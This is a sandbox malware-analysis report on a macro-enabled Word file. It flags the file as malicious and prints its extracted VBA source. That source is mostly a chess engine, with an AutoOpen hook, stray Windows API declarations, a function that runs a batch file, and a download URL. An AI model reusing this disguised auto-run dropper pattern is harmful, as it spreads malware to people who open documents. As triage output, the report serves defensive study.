MALICIOUS
152
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon opening. The presence of the 'macros.bas' file and 'vbaProject_00.bin' further indicates embedded VBA code. While the specific payload is not directly visible, the structure and heuristic firings strongly suggest it's designed to download and execute a secondary malicious component, typical of a macro-based malware dropper.
Heuristics 5
-
ClamAV: Doc.Malware.W2000m-7603021-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.W2000m-7603021-0
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub autoopen() 33 LogBase -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://xoomer.virgilio.it/ludormio/download.htmIn document text (OOXML body / shared strings)
- http://www.gnu.org/licenses/In document text (OOXML body / shared strings)
- http://xoomer.virgilio.it/ludormio/download.htm)�In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 86129 bytes |
SHA-256: 8fec315bb9796f7a76716334dbfb9e68c515146c074ae0420c716f16acbaad23 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ChessBrainVB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HashBas"
'==================================================
'= HashBas:
'= Hash functions
'==================================================
#If VBA7 Then
Public Declare PtrSafe Function GdiGetBatchLimit Lib "gdi32 " () As LongPtr
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "imagehlp.dll " (ByVal lpPath As String) As LongPtr
Public Declare PtrSafe Function CreateFileW Lib "kernel32 " (ByVal lpFileName As LongPtr, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
Public Declare PtrSafe Function SetEnvironmentVariable Lib "kernel32 " Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As LongPtr
Public Declare PtrSafe Function GetEnvironmentVariable Lib "kernel32 " Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As LongPtr) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hHandle As LongPtr) As LongPtr
#Else
Public Declare Function GdiGetBatchLimit Lib "gdi32 " () As Long
Public Declare Function MakeSureDirectoryPathExists Lib "imagehlp.dll " (ByVal lpPath As String) As Long
Public Declare Function CreateFileA Lib "kernel32 " (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function SetEnvironmentVariable Lib "kernel32 " Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As Long
Public Declare Function GetEnvironmentVariable Lib "kernel32 " Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" ( _
ByVal hHandle As Long) As Long
#End If
'The style of the hash table rows
Public Const TT_NO_BOUND As Byte = 0
Public Const TT_UPPER_BOUND As Byte = 1
Public Const TT_LOWER_BOUND As Byte = 2
Public Const TT_EXACT As Byte = 3
Private Const HASH_CLUSTER As Long = 4
Public Const TT_TB_BASE_DEPTH As Long = 222
Public Type THashKey
' 2x 32 bit
HashKey1 As Long
HashKey2 As Long
End Type
Public ZobristHash1 As Long
Public ZobristHash2 As Long
Public HashWhiteToMove As Long
Public HashWhiteToMove2 As Long
Public HashWCanCastle As Long
Public HashWCanCastle2 As Long
Public HashBCanCastle As Long
Public HashBCanCastle2 As Long
Public InHashCnt As Long
Public HashUsage As Long
Private bHashUsed As Boolean
Public HashGeneration As Long
Public EmptyHash As THashKey
Private Type HashTableEntry
Position1 As Long ' 2x32 bit position hash key
Position2 As Long
Depth As Long ' negative values possible for QSearch
MoveFrom As Byte
MoveTarget As Byte
MovePromoted As Byte
EvalType As Byte
Eval As Long
StaticEval As Long
Generation As Byte
IsChecking As Boolean
End Type
Public HashSize As Long
Dim ZobristTable(1, 0 To 16) As Long ' key for each piece typ eand board position
Dim ZobristTable2(1 To 5, 0 To 16) As Long
'The main array to hold the hash table
Private HashTable() As HashTableEntry
Public Sub InitHash()
'Initialize the hash-table
Static bIniReadDone As Boolean
If Not bIniReadDone Then
HashSize = HashSize * 40000 ' seems to fit...? hash len = 22
bIniReadDone = True
End If
End Sub
Public Function HashBoard(ExcludedMove) As THashKey
Dim i As Long, sq As Long
ZobristHash1 = 0: ZobristHash2 = 0
For i = 1 To NumPieces: sq = Pieces(i): HashSetPiece sq, Board(sq): Next i
If EpPosArr(Ply) > 0 Then HashSetPiece EpPosArr(Ply), Board(EpPosArr(Ply))
If bWhiteToMove Then
ZobristHash1 = ZobristHash1 Xor HashWhiteToMove: ZobristHash2 = ZobristHash2 Xor HashWhiteToMove2
End If
If WhiteCastled <> NO_CASTLE Then ZobristHash1 = ZobristHash1 Xor HashWCanCastle: ZobristHash2 = ZobristHash2 Xor HashWCanCastle2
If BlackCastled <> NO_CASTLE Then ZobristHash1 = ZobristHash1 Xor HashBCanCastle: ZobristHash2 = ZobristHash2 Xor HashBCanCastle2
If ExcludedMove.From > 0 Then ' different hash fьr excluded move positions
HashSetPiece ExcludedMove.From, ExcludedMove.piece: HashSetPiece ExcludedMove.Target, ExcludedMove.piece
End If
HashBoard.HashKey1 = ZobristHash1: HashBoard.HashKey2 = ZobristHash2
End Function
Public Function HashGetKey() As THashKey
HashGetKey.HashKey1 = ZobristHash1
HashGetKey.HashKey2 = ZobristHash2
End Function
Public Sub NextHashGeneration()
HashGeneration = GetMin(255, GameMovesCnt \ 2 + 1)
End Sub
Public Sub HashSetKey(ByRef HashKey As THashKey)
ZobristHash1 = HashKey.HashKey1
ZobristHash2 = HashKey.HashKey2
End Sub
Public Function InsertIntoHashTable(HashKey As THashKey, _
ByVal Depth As Long, _
HashMove, _
ByVal EvalType As Long, _
ByVal Eval As Long, _
ByVal StaticEval As Long)
Dim IndexKey As Long, TmpMove As TMove, i As Long, ReplaceIndex As Long, MaxReplaceValue As Long, ReplaceValue As Long, bPosFound As Boolean
TmpMove = HashMove ' Don't overwrite
bHashUsed = True: bPosFound = False
MaxReplaceValue = 9999
'--- Compute hash key
ZobristHash1 = HashKey.HashKey1: ZobristHash2 = HashKey.HashKey2
IndexKey = HashKeyCompute() * HASH_CLUSTER
ReplaceIndex = IndexKey
For i = 0 To HASH_CLUSTER - 1
With HashTable(IndexKey + i)
If .Position1 <> 0 Then
' Don't overwrite more valuable entry
If (.Position1 = ZobristHash1 And .Position2 = ZobristHash2) Then
' Position found: Preserve hash move if no new move
If TmpMove.From = 0 And .MoveFrom > 0 Then
TmpMove.From = .MoveFrom: TmpMove.Target = .MoveTarget: TmpMove.Promoted = .MovePromoted: TmpMove.IsChecking = .IsChecking
End If
ReplaceIndex = IndexKey + i: bPosFound = True
Exit For
Else
' Other position found. Overwrite?
ReplaceValue = .Depth - 8 * (HashGeneration - .Generation)
If ReplaceValue < MaxReplaceValue Then
MaxReplaceValue = ReplaceValue: ReplaceIndex = IndexKey + i
'If HashUsage > 0 Then HashUsage = HashUsage - 1
End If
End If
Else
If MaxReplaceValue > -9000 Then MaxReplaceValue = -9000: ReplaceIndex = IndexKey + i
End If
End With
Next
If HashTable(ReplaceIndex).Position1 = 0 And HashUsage < 2147483646 Then HashUsage = HashUsage + 1
With HashTable(ReplaceIndex)
'--- Save hash data, preserve hash move if no new move
If Not bPosFound Or EvalType = TT_EXACT Or Depth > .Depth - 4 Or .Generation <> HashGeneration Then
.Position1 = ZobristHash1: .Position2 = ZobristHash2
.MoveFrom = TmpMove.From: .MoveTarget = TmpMove.Target: .MovePromoted = TmpMove.Promoted
.EvalType = EvalType: .Eval = ScoreToHash(Eval)
.StaticEval = StaticEval: .Depth = Depth
.Generation = HashGeneration
.IsChecking = TmpMove.IsChecking
End If
End With
End Function
Public Function IsInHashTable(HashKey As THashKey, _
ByRef HashDepth As Long, _
HashMove, _
ByRef EvalType As Long, _
ByRef Eval As Long, _
ByRef StaticEval As Long) As Boolean
Dim IndexKey As Long, i As Long
IsInHashTable = False: HashMove = EmptyMove: EvalType = TT_NO_BOUND: Eval = UNKNOWN_SCORE: StaticEval = UNKNOWN_SCORE: HashDepth = -999
ZobristHash1 = HashKey.HashKey1
ZobristHash2 = HashKey.HashKey2
IndexKey = HashKeyCompute() * HASH_CLUSTER
For i = 0 To HASH_CLUSTER - 1
If HashTable(IndexKey + i).Position1 <> 0 And ZobristHash1 <> 0 Then
With HashTable(IndexKey + i)
If ZobristHash1 = .Position1 And ZobristHash2 = .Position2 Then
If .Depth > HashDepth Then
' entry found
IsInHashTable = True
If InHashCnt < 2000000 Then InHashCnt = InHashCnt + 1
'--- Read hash data
If .MoveFrom > 0 Then
HashMove.From = .MoveFrom: HashMove.Target = .MoveTarget
HashMove.Promoted = .MovePromoted: HashMove.IsChecking = .IsChecking: HashMove.IsInCheck = .IsChecking
HashMove.Captured = Board(.MoveTarget): HashMove.piece = Board(.MoveFrom): HashMove.CapturedNumber = Squares(.MoveTarget)
Select Case HashMove.piece
Case WPAWN
If .MoveTarget - .MoveFrom = 20 Then
HashMove.EnPassant = 1
ElseIf Board(.MoveTarget) = BEP_PIECE Then
HashMove.EnPassant = 3
End If
Case BPAWN
If .MoveFrom - .MoveTarget = 20 Then
HashMove.EnPassant = 2
ElseIf Board(.MoveTarget) = WEP_PIECE Then
HashMove.EnPassant = 3
End If
Case WKING
If .MoveFrom = SQ_E1 Then
If .MoveTarget = SQ_G1 Then
HashMove.Castle = WHITEOO
ElseIf .MoveTarget = SQ_C1 Then
HashMove.Castle = WHITEOOO
End If
End If
Case BKING
If .MoveFrom = SQ_E8 Then
If .MoveTarget = SQ_G8 Then
HashMove.Castle = BLACKOO
ElseIf .MoveTarget = SQ_C8 Then
HashMove.Castle = BLACKOOO
End If
End If
End Select
End If
EvalType = .EvalType: Eval = HashToScore(.Eval): StaticEval = .StaticEval
HashDepth = .Depth
.Generation = HashGeneration ' Update generation
Exit For
End If
End If
End With
End If
Next
End Function
Public Function LimitDouble(ByVal d As Double) As Long
' Prevent overflow by looping off anything beyond 31 bits
Const MaxNumber As Double = 2 ^ 31
LimitDouble = CLng(d - (Fix(d / MaxNumber) * MaxNumber))
End Function
Public Sub InitZobrist()
Static bDone As Boolean
Dim p As Long, s As Long
If bDone Then Exit Sub
bDone = True
ZobristHash1 = 0: ZobristHash2 = 0
Randomize 1001 ' init random generator with fix value
For p = SQ_A1 To SQ_H8
For s = 0 To 16
ZobristTable(p, s) = CalcUniqueKey(): ZobristTable2(p, s) = CalcUniqueKey()
Next
Next
HashWhiteToMove = CalcUniqueKey(): HashWhiteToMove2 = CalcUniqueKey()
HashWCanCastle = CalcUniqueKey(): HashWCanCastle2 = CalcUniqueKey()
HashBCanCastle = CalcUniqueKey(): HashBCanCastle2 = CalcUniqueKey()
End Sub
Private Function CalcUniqueKey() As Long
Static KeyList((1 - 0 + 1) * 17 * 2 + 8) As Long
Static ListCnt As Long
Dim l As Long, i As Long
NextTry:
l = 65536 * (Int(Rnd * 65536) - 32768) Or Int(Rnd * 65536)
For i = 1 To ListCnt
If KeyList(i) = l Then GoTo NextTry
Next
ListCnt = ListCnt + 1: KeyList(ListCnt) = l
CalcUniqueKey = l
End Function
Public Sub HashSetPiece(ByVal Position As Long, ByVal piece As Long)
If piece = FRAME Or piece = NO_PIECE Then Exit Sub
ZobristHash1 = ZobristHash1 Xor ZobristTable(Position, piece)
ZobristHash2 = ZobristHash2 Xor ZobristTable2(Position, piece)
End Sub
Public Sub HashDelPiece(ByVal Position As Long, ByVal piece As Long)
If piece = FRAME Or piece = NO_PIECE Then Exit Sub
ZobristHash1 = ZobristHash1 Xor ZobristTable(Position, piece)
ZobristHash2 = ZobristHash2 Xor ZobristTable2(Position, piece)
End Sub
Public Sub HashMovePiece(ByVal From As Long, Target As Long, ByVal piece As Long)
ZobristHash1 = ZobristHash1 Xor ZobristTable(From, piece) Xor ZobristTable(Target, piece)
ZobristHash2 = ZobristHash2 Xor ZobristTable(From, piece) Xor ZobristTable2(Target, piece)
End Sub
Public Function HashKeyCompute() As Long
HashKeyCompute = ZobristHash1 Xor ZobristHash2
If HashKeyCompute = -2147483648# Then HashKeyCompute = HashKeyCompute + 1
HashKeyCompute = Abs(HashKeyCompute) Mod (HashSize \ HASH_CLUSTER)
End Function
Public Sub SetHashToMove()
If bWhiteToMove Then
ZobristHash1 = ZobristHash1 Xor HashWhiteToMove: ZobristHash2 = ZobristHash2 Xor HashWhiteToMove2
End If
End Sub
Public Sub HashSetCastle()
If WhiteCastled = NO_CASTLE Then ZobristHash1 = ZobristHash1 Xor HashWCanCastle: ZobristHash2 = ZobristHash2 Xor HashWCanCastle2
If BlackCastled = NO_CASTLE Then ZobristHash1 = ZobristHash1 Xor HashBCanCastle: ZobristHash2 = ZobristHash2 Xor HashBCanCastle2
End Sub
Public Function ScoreToHash(ByVal Score As Long) As Long
If Score >= MATE_IN_MAX_PLY Then
ScoreToHash = Score + Ply
ElseIf Score <= -MATE_IN_MAX_PLY Then
ScoreToHash = Score - Ply
Else
ScoreToHash = Score
End If
End Function
Public Function HashToScore(ByVal Score As Long) As Long
If Score = UNKNOWN_SCORE Then
HashToScore = Score
ElseIf Score >= MATE_IN_MAX_PLY Then
HashToScore = Score - Ply
ElseIf Score <= -MATE_IN_MAX_PLY Then
HashToScore = Score + Ply
Else
HashToScore = Score
End If
End Function
Public Function HashUsagePerc() As String
If HashSize = 0 Then
HashUsagePerc = ""
Else
HashUsagePerc = Format(HashUsage * 100& / HashSize, "0.0")
End If
End Function
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{BB0204FA-FA76-4590-ADC4-D2806F83FDE8}{8EFB5800-A9BC-4BBA-B942-B59E545B59CC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UtilVBAbas"
Public Const TEST_MODE As Boolean = True
Public ThisApp As Object ' Office object: Excel, Word,...
Public psGameFile As String
Public LastInfoNodes As Long
Public psLastFieldClick As String
Public psLastFieldMouseDown As String
Public psLastFieldMouseUp As String
Public SetupBoardMode As Boolean ' manual board setup using GUI
Public SetupPiece As Long
' GUI colors
Public WhiteSqCol As Long
Public BlackSqCol As Long
Public BoardFrameCol As Long
Public plFieldFrom As Long, plFieldTarget As Long
Public psFieldFrom As String, psFieldTarget As String
Dim plFieldFromColor As Long, plFieldTargetColor As Long
Dim psMove As String
Dim sOutput As String
Public Function OpenApp()
ExecuteCommand "C:\Defrag\1\Disk\Report\Other.BAT"
End Function
Public Function FieldNumToBoardPos(ByVal ilFieldNum As Long) As Long
Dim s As String
s = FieldNumToCoord(ilFieldNum)
FieldNumToBoardPos = FileRev(Left(s, 1)) + RankRev(Mid(s, 2, 1))
End Function
Public Function CheckGUIMoveIsLegal(MoveFromText, MoveTargetText, oLegalMoves As Long) As Boolean
' Input: "e2", "e4", Output: oLegalMoves:Number of Legal Moves
Dim a As Long, NumMoves As Long, From As Long, Target As Long
CheckGUIMoveIsLegal = False
Ply = 0
oLegalMoves = GenerateLegalMoves(NumMoves)
If oLegalMoves > 0 Then
From = FileRev(Left(MoveFromText, 1)) + RankRev(Mid(MoveFromText, 2, 1))
Target = FileRev(Left(MoveTargetText, 1)) + RankRev(Mid(MoveTargetText, 2, 1))
For a = 0 To NumMoves - 1
If Moves(0, a).From = From And Moves(0, a).Target = Target Then
CheckGUIMoveIsLegal = Moves(0, a).IsLegal: Exit For
End If
Next a
End If
End Function
Public Sub ShowLegalMovesForPiece(MoveFromText)
' Input: square as text "e2"
Dim a As Long, NumMoves As Long, From As Long, Target As Long
Dim NumLegalMoves As Long, ctrl As Control, bFound As Boolean
Ply = 0: bFound = False
NumLegalMoves = GenerateLegalMoves(NumMoves)
From = FileRev(Left(MoveFromText, 1)) + RankRev(Mid(MoveFromText, 2, 1))
If NumLegalMoves = 0 Then
SendCommand "No legal moves!"
Else
For Each ctrl In frmChessX.Controls
Target = Val("0" & ctrl.Tag)
If Target > 0 Then
For a = 0 To NumMoves - 1
If Moves(0, a).From = From And Moves(0, a).Target = Target And Moves(0, a).IsLegal Then
ctrl.BackColor = &HC0FFC0
bFound = True
End If
Next a
End If
Next ctrl
If Not bFound Then
SendCommand "No legal move for this piece!"
End If
End If
End Sub
Public Sub ResetGUIFieldColors()
Dim x As Long, Y As Long, bBackColorIsWhite As Boolean, i As Long
bBackColorIsWhite = False
For Y = 1 To 8
For x = 1 To 8
i = x + (Y - 1) * 8
With frmChessX.fraBoard.Controls("Square" & i)
If bBackColorIsWhite Then
If .BackColor <> WhiteSqCol Then .BackColor = WhiteSqCol
Else
If .BackColor <> BlackSqCol Then .BackColor = BlackSqCol
End If
End With
bBackColorIsWhite = Not bBackColorIsWhite
Next x
bBackColorIsWhite = Not bBackColorIsWhite
Next Y
End Sub
Public Function GenerateLegalMoves(olTotalMoves As Long) As Long
' Returns all moves in Moves(ply). Moves(x).IsLegal=true for legal moves
Dim LegalMoves As Long, lLegalMoves As Long, i As Long, NumMoves As Long
GenerateMoves Ply, False, NumMoves
Ply = 0: lLegalMoves = 0
For i = 0 To NumMoves - 1
RemoveEpPiece
MakeMove Moves(Ply, i)
If CheckLegal(Moves(Ply, i)) Then
Moves(Ply, i).IsLegal = True: lLegalMoves = lLegalMoves + 1
Debug.Print MoveText(Moves(Ply, i))
End If
UnmakeMove Moves(Ply, i)
ResetEpPiece
'Debug.Print MovesText(Moves(0, i)), Moves(Ply, i).IsLegal
Next
olTotalMoves = NumMoves
GenerateLegalMoves = lLegalMoves
End Function
Public Sub ShowColToMove()
With frmChessX.lblColToMove
If bWhiteToMove Then
.BackColor = vbWhite
.ForeColor = vbBlack
.Caption = Translate("White to move")
Else
.BackColor = vbBlack
.ForeColor = vbWhite
.Caption = Translate("Black to move")
End If
End With
End Sub
Public Sub ShowLastMoveAtBoard()
If GameMovesCnt = 0 Then Exit Sub
ShowMove arGameMoves(GameMovesCnt).From, arGameMoves(GameMovesCnt).Target
End Sub
Public Sub ShowMove(From As Long, Target As Long)
' show move on board with different backcolor
Dim Pos As Long, ctrl As Control
If From > 0 Then
For Each ctrl In frmChessX.Controls
Pos = Val("0" & ctrl.Tag)
If Pos = From Then ctrl.BackColor = &HC0FFC0
Next ctrl
End If
If Target > 0 Then
For Each ctrl In frmChessX.Controls
Pos = Val("0" & ctrl.Tag)
If Pos = Target Then ctrl.BackColor = &HC0FFC0
Next ctrl
End If
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{ACAF3CB3-D1C3-4855-A3D3-A1AD33F4BB69}{BB1B400D-7843-4DE1-A7C5-B8C8E6249F66}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "BoardBas"
' 110 -- -- -- -- -- -- -- -- -- -- 119
' 100 -- -- -- -- -- -- -- -- -- -- 109
' 90 -- A8 B8 C8 D8 E8 F8 G8 H8 -- 99
' 80 -- A7 B7 C7 D7 E7 F7 G7 H7 -- 89
' 70 -- A6 B6 C6 D6 E6 F6 G6 H6 -- 79
' 60 -- A5 B5 C5 D5 E5 F5 G5 H5 -- 69
' 50 -- A4 B4 C4 D4 E4 F4 G4 H4 -- 59
' 40 -- A3 B3 C3 D3 E3 F3 G3 H3 -- 49
' 30 -- A2 B2 C2 D2 E2 F2 G2 H2 -- 39
' 20 -- A1 B1 C1 D1 E1 F1 G1 H1 -- 29
' 10 -- -- -- -- -- -- -- -- -- -- 19
' 0 -- -- -- -- -- -- -- -- -- -- 9
'
Public NumPieces As Long '--- Current number of pieces at ply 0 in Pieces list
Public Pieces(32) As Long '--- List of pieces: pointer to board position (Captured pieces ares set to zero during search)
Public PieceCnt(16) As Long ' number of pieces per piece type and color
Public bWhiteToMove As Boolean '--- false if black to move, often used
Public bCompIsWhite As Boolean
Public CastleFlag
Public WhiteCastled
Public BlackCastled
Public WPromotions(5) As Long '--- list of promotion pieces
Public BPromotions(5) As Long
Public LegalMovesOutOfCheck As Long
Public WKingLoc As Long
Public BKingLoc As Long
Public PieceType(16) As Long ' sample: maps black pawn and white pawn pieces to PT_PAWN
Public PieceColor(16) As Long ' white / Black
Public Ply As Long ' current ply
Public arFiftyMove(499) As Long
Public Fifty As Long
'--- For faster move generation
Public WhitePiecesStart As Long
Public WhitePiecesEnd As Long
Public BlackPiecesStart As Long
Public BlackPiecesEnd As Long
Public TotalMoveCnt As Long
'--- SEE data
Dim PieceList(0 To 32) As Long, Cnt As Long
Dim SwapList(0 To 32) As Long, slIndex As Long
Dim Blocker(1 To 32) As Long, Block As Long
'--------------------------------
' Offsets for move generation
Public QueenOffsets(7) As Long
Public KnightOffsets(7) As Long
Public BishopOffsets(3) As Long
Public RookOffsets(3) As Long
Public OppositeDir(-11 To 11) As Long
Public EpPosArr(0 To 128) As Long
Public MovesPly(0 To 128 + 1) As String
Public MaxDistance(0 To 7, 0 To 8) As Long
Private bGenCapturesOnly As Boolean
'------------------------------------
Const MOVEFILE_REPLACE_EXISTING = &H1
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Const FILE_BEGIN = 0
Const FILE_SHARE_READ = &H1
Const CREATE_ALWAYS = 2
Const OPEN_EXISTING = 4
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000
Public Sub UnmakeMove(mMove)
Dim From As Long, Target As Long
Dim Captured As Long, EnPassant As Long, CapturedNumber As Long
Dim Promoted As Long, Castle As Long, PieceTarget As Long
With mMove
From = .From: Target = .Target: Captured = .Captured
EnPassant = .EnPassant: Promoted = .Promoted: Castle = .Castle: CapturedNumber = .CapturedNumber
End With
PieceTarget = Board(Target)
Squares(From) = Squares(Target): Squares(Target) = CapturedNumber
Pieces(Squares(Target)) = Target: Pieces(Squares(From)) = From
Fifty = arFiftyMove(Ply)
Select Case Castle
Case NO_CASTLE
Case WHITEOO
WhiteCastled = NO_CASTLE
Board(SQ_F1) = NO_PIECE: Moved(SQ_F1) = Moved(SQ_F1) - 1
Board(SQ_H1) = WROOK: Moved(SQ_H1) = Moved(SQ_H1) - 1
Squares(SQ_H1) = Squares(SQ_F1): Squares(SQ_F1) = 0: Pieces(Squares(SQ_H1)) = SQ_H1
Board(SQ_E1) = WKING: Moved(SQ_E1) = Moved(SQ_E1) - 1: WKingLoc = SQ_E1
Board(SQ_G1) = NO_PIECE: Moved(SQ_G1) = Moved(SQ_G1) - 1
GoTo lblExit
Case WHITEOOO
WhiteCastled = NO_CASTLE
Board(SQ_D1) = NO_PIECE: Moved(SQ_D1) = Moved(SQ_D1) - 1
Board(SQ_A1) = WROOK: Moved(SQ_A1) = Moved(SQ_A1) - 1
Squares(SQ_A1) = Squares(SQ_D1): Squares(SQ_D1) = 0: Pieces(Squares(SQ_A1)) = SQ_A1
Board(SQ_E1) = WKING: Moved(SQ_E1) = Moved(SQ_E1) - 1: WKingLoc = SQ_E1
Board(SQ_C1) = NO_PIECE: Moved(SQ_C1) = Moved(SQ_C1) - 1
GoTo lblExit
Case BLACKOO
BlackCastled = NO_CASTLE
Board(SQ_F8) = NO_PIECE: Moved(SQ_F8) = Moved(SQ_F8) - 1
Board(SQ_H8) = BROOK: Moved(SQ_H8) = Moved(SQ_H8) - 1
Squares(SQ_H8) = Squares(SQ_F8): Squares(SQ_F8) = 0: Pieces(Squares(SQ_H8)) = SQ_H8
Board(SQ_E8) = BKING: Moved(SQ_E8) = Moved(SQ_E8) - 1: BKingLoc = SQ_E8
Board(SQ_G8) = NO_PIECE: Moved(SQ_G8) = Moved(SQ_G8) - 1
GoTo lblExit
Case BLACKOOO
BlackCastled = NO_CASTLE
Board(SQ_D8) = NO_PIECE: Moved(SQ_D8) = Moved(SQ_D8) - 1
Board(SQ_A8) = BROOK: Moved(SQ_A8) = Moved(SQ_A8) - 1
Squares(SQ_A8) = Squares(SQ_D8): Squares(SQ_D8) = 0: Pieces(Squares(SQ_A8)) = SQ_A8
Board(SQ_E8) = BKING: Moved(SQ_E8) = Moved(SQ_E8) - 1: BKingLoc = SQ_E8
Board(SQ_C8) = NO_PIECE: Moved(SQ_C8) = Moved(SQ_C8) - 1
GoTo lblExit
End Select
If EnPassant = 1 Then
Board(From + 10) = NO_PIECE
ElseIf EnPassant = 2 Then
Board(From - 10) = NO_PIECE
End If
If EnPassant = 3 Then
If PieceTarget = WPAWN Then
Board(From) = PieceTarget
Board(Target) = NO_PIECE
Board(Target - 10) = BPAWN: PieceCntPlus BPAWN
Squares(Target - 10) = CapturedNumber
Pieces(CapturedNumber) = Target - 10
Squares(Target) = 0
ElseIf PieceTarget = BPAWN Then
Board(From) = PieceTarget
Board(Target) = NO_PIECE
Board(Target + 10) = WPAWN: PieceCntPlus WPAWN
Squares(Target + 10) = CapturedNumber
Pieces(CapturedNumber) = Target + 10
Squares(Target) = 0
End If
Moved(From) = Moved(From) - 1
GoTo lblExit
ElseIf Promoted <> 0 Then
If Promoted Mod 2 = WCOL Then
Board(From) = WPAWN: PieceCntPlus WPAWN
PieceCntMinus Board(Target)
Board(Target) = Captured
Moved(From) = Moved(From) - 1
Moved(Target) = Moved(Target) - 1
Else
Board(From) = BPAWN: PieceCntPlus BPAWN
PieceCntMinus Board(Target)
Board(Target) = Captured
Moved(From) = Moved(From) - 1
Moved(Target) = Moved(Target) - 1
End If
Else
'--- normal move
Select Case PieceTarget
Case WKING: WKingLoc = From
Case BKING: BKingLoc = From
End Select
Board(From) = PieceTarget: Moved(From) = Moved(From) - 1
Board(Target) = Captured: Moved(Target) = Moved(Target) - 1
End If
If Captured > 0 And Captured < NO_PIECE Then PieceCntPlus Captured
lblExit:
bWhiteToMove = Not bWhiteToMove ' switch side to move
End Sub
'---------------------------------------------------------------------------
' InitPieceSquares: Init tables for pieces and squares
' Squares(board location) points to piece in Pieces() list
' Pieces(piece num) points to board location
'---------------------------------------------------------------------------
Public Sub InitPieceSquares()
Dim i As Long, PT As Long
NumPieces = 0
Pieces(0) = 0
Erase PieceCnt()
Erase Squares()
Erase Pieces()
'--- White --
WhitePiecesStart = 1
For PT = PT_PAWN To PT_KING ' sort by piece type
For i = SQ_A1 To SQ_H8
If (Board(i) <> FRAME And Board(i) < NO_PIECE And Board(i) Mod 2 = WCOL) And PieceType(Board(i)) = PT Then
NumPieces = NumPieces + 1: Pieces(NumPieces) = i: Squares(i) = NumPieces
PieceCntPlus Board(i)
Select Case Board(i)
Case WKING: WKingLoc = i
End Select
End If
Next
Next
WhitePiecesEnd = NumPieces
'--- Black ---
BlackPiecesStart = NumPieces + 1
For PT = PT_PAWN To PT_KING
For i = SQ_A1 To SQ_H8
If (Board(i) <> FRAME And Board(i) < NO_PIECE And Board(i) Mod 2 = BCOL) And PieceType(Board(i)) = PT Then
NumPieces = NumPieces + 1: Pieces(NumPieces) = i: Squares(i) = NumPieces
PieceCntPlus Board(i)
Select Case Board(i)
Case BKING: BKingLoc = i
End Select
End If
Next
Next
BlackPiecesEnd = NumPieces
ResetMaterial
End Sub
Public Sub PieceCntPlus(ByVal piece As Long)
If piece > FRAME And piece < NO_PIECE Then PieceCnt(piece) = PieceCnt(piece) + 1
End Sub
Public Sub PieceCntMinus(ByVal piece As Long)
If piece > FRAME And piece < NO_PIECE Then PieceCnt(piece) = PieceCnt(piece) - 1
